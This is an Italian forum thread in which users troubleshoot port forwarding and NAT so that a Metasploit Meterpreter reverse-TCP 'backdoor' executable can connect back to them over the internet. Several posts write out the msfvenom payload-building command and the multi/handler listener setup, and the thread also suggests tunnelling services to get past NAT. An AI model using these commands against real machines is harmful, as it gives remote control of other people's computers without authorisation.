Domanda Risolto Malware Backdoor e PortForwarding.

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
LordZSalaZaR ha detto:
Scusami se te lo dico ma dove lo hai visto questo IP oscurato? Io non ho oscurato nulla se mi fai vedere cosa ho oscurato te ne sarei grato
Clicca per espandere...
Port.PNG


Questo non è un IP completo, se non è stato oscurato allora è inserito in maniera errata, se invece è stato oscurato non era necessario poichè è un IP privato e non pubblico.

ChryITA ha detto:
Che c'entra ora? Noi vogliamo solo capire come si facciano queste backdoor dato che è da troppo tempo che ci proviamo ma non riusciamo
E piuttosto sapresti dirci come togliere la macchina virtuale sotto NAT? Dalle spunte delle opzioni?
Clicca per espandere...
Centra che state facendo cose a caso senza capire realmente cosa stia succedendo. State usando una macchina virtuale senza sapere se sia in NAT o no, state facendo delle regole di forwarding senza sapere se la configurazione funzioni o meno.
"capire come si facciano queste backdoor" lo avete già capito, i comandi sono quelli, il problema è che non capite come farle funzionare, perchè appunto non conoscete il funzionamento degli strumenti che state usando.

Il mio supporto finisce qui, avete trovato gli errori e avete capito cosa non va. Ora sta a voi usare google (perchè si tratta solamente di quello) e riuscire a far funzionare il tutto
 
  • Mi piace
Reazioni: Utente cancellato 274325 e JunkCoder
Ovviamente sì, devi per forza fare il forwarding altrimenti come può un pc fuori dalla LAN contattare un computer in LAN? Il router non saprebbe come gestire le connessioni, perciò deve essere istruito a "smaltire" le connessioni che gli arrivano sulle varie porte ai diretti interessati.

Domoho ha detto:
e soprattutto devo inserire host e porta (nella creazione della backdoor) in base a qualche parametro del mio modem?
Clicca per espandere...
sulla porta hai libertà di scelta, l'IP deve ovviamente essere quello pubblico
 
  • Mi piace
Reazioni: Domoho
D

Domoho

Utente Bronze
17 Dicembre 2020
25
10
7
22
Ultima modifica:
buonasera a tutti, è sempre un piacere ritornare qui ;)
sono un po freddino e ho bisogno di qualche dritta sul portforwarding e sulle backdoor.
vorrei fare un po di test a distanza con delle backdoor, ricordo però che se non ho il portforwarding attivo non è possibile comandarle a distanza, mi sbaglio?
e soprattutto devo inserire host e porta (nella creazione della backdoor) in base a qualche parametro del mio modem?
grazie in anticipo :)
(modifica: porta rischi attivare il portforwarding??)
 
0xbro ha detto:
Ovviamente sì, devi per forza fare il forwarding altrimenti come può un pc fuori dalla LAN contattare un computer in LAN? Il router non saprebbe come gestire le connessioni, perciò deve essere istruito a "smaltire" le connessioni che gli arrivano sulle varie porte ai diretti interessati.


sulla porta hai libertà di scelta, l'IP deve ovviamente essere quello pubblico
Clicca per espandere...
ok grazie mille, ieri ho aperto tutte le porte che potevo aprire sul pannello di controllo del modem (TP-LINK), continua a non funzionare, una volta che faccio aprire la backdoor a un mio amico (ovviamente a distanza e consenziente ahah) non ricevo nessun segnale, invece se lo apro io (connesso alla mia rete) non da nessun problema, non riesco a capire se il problema è stata dalla creazione della backdoor o magari io che abbia sbagliato a fare il forwarding :(
 
Domoho ha detto:
ok grazie mille, ieri ho aperto tutte le porte che potevo aprire sul pannello di controllo del modem (TP-LINK), continua a non funzionare, una volta che faccio aprire la backdoor a un mio amico (ovviamente a distanza e consenziente ahah) non ricevo nessun segnale, invece se lo apro io (connesso alla mia rete) non da nessun problema, non riesco a capire se il problema è stata dalla creazione della backdoor o magari io che abbia sbagliato a fare il forwarding :(
Clicca per espandere...
se scrivi i comandi che hai dato per creare la backdoor e per metterti in ascolto possiamo cercare l'errore.

Con quale gestore internet hai il contratto?
 
0xbro ha detto:
scrivi tutti i comandi qua sotto e vediamo
Clicca per espandere...
Allora dimmi se ho sbagliato qualcosa nel settare l'ip statico sulla macchina attacante cioè linux. Ho eseguito i seguenti comandi:

sudo ifconfig [nome_interfaccia] [indirzzo_IP] netmask 255.255.255.0

/etc/init.d/networking restart

Per quanto riguarda msfvenom il Payload lo creo con il seguente comando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP PUBBLICO] LPORT=[LA PORTA CHE HO FORWARDATO] -f exe -o backdoor.exe

Per metasploit invece apro msfconsole e digito:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST [IP MACCHINA ATTACANTE]
set LPORT [PORTA FORWARDATA]
exploit

[*] Started reverse TCP handler on[IP]/[PORTA]

ma nulla quando apre il .exe non si apre nessuna sessione.
Messaggio unito automaticamente:

0xbro ha detto:
scrivi tutti i comandi qua sotto e vediamo
Clicca per espandere...
Purtroppo sono sotto NAT e non posso fare la backdoor, come posso ovviare a questo problema? Grazie
 
0xbro ha detto:
scrivi tutti i comandi qua sotto e vediamo
Clicca per espandere...
Ciao io e chry stiamo testando queste backdoor tra di noi,dopo aver settato ip statico aver forwardato le porte e il tutto non si apre nessuna sessione,non sono sotto NAT e ti elenco tutti i comandi che ho utilizzato:

sudo ifconfig [nome_interfaccia] [indirzzo_IP] netmask 255.255.255.0

/etc/init.d/networking restart

Per quanto riguarda msfvenom il Payload lo creo con il seguente comando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP PUBBLICO] LPORT=[LA PORTA CHE HO FORWARDATO] -f exe -o backdoor.exe

Per metasploit invece apro msfconsole e digito:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST [IP MACCHINA ATTACANTE]
set LPORT [PORTA FORWARDATA]
exploit

[*] Started reverse TCP handler on[IP]/[PORTA]
 
ChryITA ha detto:
Allora dimmi se ho sbagliato qualcosa nel settare l'ip statico sulla macchina attacante cioè linux. Ho eseguito i seguenti comandi:

sudo ifconfig [nome_interfaccia] [indirzzo_IP] netmask 255.255.255.0

/etc/init.d/networking restart

Per quanto riguarda msfvenom il Payload lo creo con il seguente comando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP PUBBLICO] LPORT=[LA PORTA CHE HO FORWARDATO] -f exe -o backdoor.exe

Per metasploit invece apro msfconsole e digito:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST [IP MACCHINA ATTACANTE]
set LPORT [PORTA FORWARDATA]
exploit

[*] Started reverse TCP handler on[IP]/[PORTA]

ma nulla quando apre il .exe non si apre nessuna sessione.
Messaggio unito automaticamente:


Purtroppo sono sotto NAT e non posso fare la backdoor, come posso ovviare a questo problema? Grazie
Clicca per espandere...
Sei sei sotto NAT temo ci sia ben poco da fare, puoi provare a utilizzare un DDNS oppure servizi come ngrok o http://localhost.run/ ma non sono sicuro si possa fare qualcosa

@LordZSalaZaR i tuoi comandi sono giusti, sei sicuro di aver effettuato correttamente il port forwarding? Non è che hai un firewall o un antivirus che blocca le connessioni sulla macchina che attacchi? La tua Virtual Machine è in NAT o in Bridge?
 
0xbro ha detto:
Sei sei sotto NAT temo ci sia ben poco da fare, puoi provare a utilizzare un DDNS oppure servizi come ngrok o http://localhost.run/ ma non sono sicuro si possa fare qualcosa

@LordZSalaZaR i tuoi comandi sono giusti, sei sicuro di aver effettuato correttamente il port forwarding? Non è che hai un firewall o un antivirus che blocca le connessioni sulla macchina che attacchi? La tua Virtual Machine è in NAT o in Bridge?
Clicca per espandere...
Come antivirus uso Malwarebytes per quanto riguarda il port forwarding ti allego uno screenshot. Uso vmware come virtual machine come posso verificare se è in nat o in bridge?

Sul port forwarding su HOST lan metto l'ip statico che ho settato su linux
(Il mio gestore è Tim)
 

Allegati

  • Port.PNG
    Port.PNG
    12.4 KB · Visualizzazioni: 49
LordZSalaZaR ha detto:
Come antivirus uso Malwarebytes per quanto riguarda il port forwarding ti allego uno screenshot. Uso vmware come virtual machine come posso verificare se è in nat o in bridge?

Sul port forwarding su HOST lan metto l'ip statico che ho settato su linux
(Il mio gestore è Tim)
Clicca per espandere...
Credo che su Host LAN tu debba mettere l'IP completo del tuo PC. Su VMWare devi andare nelle impostazioni della macchina virtuale e verificare come sia impostata l'opzione "scheda di rete"
 
0xbro ha detto:
Sei sei sotto NAT temo ci sia ben poco da fare, puoi provare a utilizzare un DDNS oppure servizi come ngrok o http://localhost.run/ ma non sono sicuro si possa fare qualcosa

@LordZSalaZaR i tuoi comandi sono giusti, sei sicuro di aver effettuato correttamente il port forwarding? Non è che hai un firewall o un antivirus che blocca le connessioni sulla macchina che attacchi? La tua Virtual Machine è in NAT o in Bridge?
Clicca per espandere...
esatto, abbiamo fatto tutto e ci hanno detto probabilmente che eravamo sotto NAT, consigliandoci di contattare te che sicuramente ne sapevi qualcosa
Messaggio unito automaticamente:

0xbro ha detto:
no dico che nella foto che hai mandato c'è scritto un indirizzo IP non intero, devi metterlo completo
Clicca per espandere...
l'ip è completo, l'ha solamente oscurato
Messaggio unito automaticamente:

0xbro ha detto:
Credo che su Host LAN tu debba mettere l'IP completo del tuo PC. Su VMWare devi andare nelle impostazioni della macchina virtuale e verificare come sia impostata l'opzione "scheda di rete"
Clicca per espandere...
c'entra qualcosa questo?
 

Allegati

  • NAT.PNG
    NAT.PNG
    32.3 KB · Visualizzazioni: 33
ChryITA ha detto:
c'entra qualcosa questo?
Clicca per espandere...
Ovvio, hai la macchina viruale sotto NAT. Prima di giocare a fare le backdoor forse sarebbe meglio capire cosa signifchino queste sigle e cosa sia il NAT, non credete?

Inoltre il fatto che abbiate oscurato l'IP privato mi fa inture che non conosciate nemmeno la differenza tra un IP pubblico e privato... forse e meglio studiare prima un po' di basi?
 
0xbro ha detto:
Ovvio, hai la macchina viruale sotto NAT. Prima di giocare a fare le backdoor forse sarebbe meglio capire cosa signifchino queste sigle e cosa sia il NAT, non credete?

Inoltre il fatto che abbiate oscurato l'IP privato mi fa inture che non conosciate nemmeno la differenza tra un IP pubblico e privato... forse e meglio studiare prima un po' di basi?
Clicca per espandere...
Che c'entra ora? Noi vogliamo solo capire come si facciano queste backdoor dato che è da troppo tempo che ci proviamo ma non riusciamo
Messaggio unito automaticamente:

E piuttosto sapresti dirci come togliere la macchina virtuale sotto NAT? Dalle spunte delle opzioni?
 
0xbro ha detto:
Ovvio, hai la macchina viruale sotto NAT. Prima di giocare a fare le backdoor forse sarebbe meglio capire cosa signifchino queste sigle e cosa sia il NAT, non credete?

Inoltre il fatto che abbiate oscurato l'IP privato mi fa inture che non conosciate nemmeno la differenza tra un IP pubblico e privato... forse e meglio studiare prima un po' di basi?
Clicca per espandere...


Scusami se te lo dico ma dove lo hai visto questo IP oscurato? Io non ho oscurato nulla se mi fai vedere cosa ho oscurato te ne sarei grato
 
0xbro ha detto:
Visualizza allegato 52265

Questo non è un IP completo, se non è stato oscurato allora è inserito in maniera errata, se invece è stato oscurato non era necessario poichè è un IP privato e non pubblico.


Centra che state facendo cose a caso senza capire realmente cosa stia succedendo. State usando una macchina virtuale senza sapere se sia in NAT o no, state facendo delle regole di forwarding senza sapere se la configurazione funzioni o meno.
"capire come si facciano queste backdoor" lo avete già capito, i comandi sono quelli, il problema è che non capite come farle funzionare, perchè appunto non conoscete il funzionamento degli strumenti che state usando.

Il mio supporto finisce qui, avete trovato gli errori e avete capito cosa non va. Ora sta a voi usare google (perchè si tratta solamente di quello) e riuscire a far funzionare il tutto
Clicca per espandere...


Il 192.168 che vedi era solo “Indicativo” per fare un esempio, conosco bene la differenza tra un Ip pubblico e uno privato volevo solo chiarezza nel parametro Host LAN tutto qui. Comunque sono riuscito a farla andare in wan grazie del supporto
Messaggio unito automaticamente:

FuckSociety ha detto:
Quindi non hai inserito l'IP completo?
Clicca per espandere...
Era solo “Indicativo” il 192.168 per fare un esempio perché non avevo ben chiaro il parametro Host LAN.
 
Stato
Discussione chiusa ad ulteriori risposte.

DISCUSSIONI SIMILI

J
Discussione Exploit Apple e la Backdoor hardware NSA - Operation Triangulation
  • 3
  • 635
3
635
Advanced Hacking
ne0h
D
Guida Router, modem, access point, switch cosa sono?
  • 1
  • 842
1
842
Manuali di Informatica e Reti
0xbro
0
Guida Cosa è un Penetration Test e quali sono le sue fasi
  • Release
  • In evidenza
  • 2
  • 3K
2
3K
Pentesting e Ethical Hacking Guide e Tools
MRPants
Discussione Stripe: gateway di pagamento che permette checking con API e addebiti diretti agli acquirenti
  • 0
  • 764
0
764
Web Development
☣ᴋɪʟʟ ꜰᴏʀ ᴛʜᴇ ᴛʜʀɪʟʟ☣
D
Guida Tutte le tipologie di connessione e le differenze: Adsl, Vdsl, Fibra FTTC o FTTH?
  • 6
  • 861
6
861
Manuali di Informatica e Reti
DjCanigia
Top Bottom
Indietro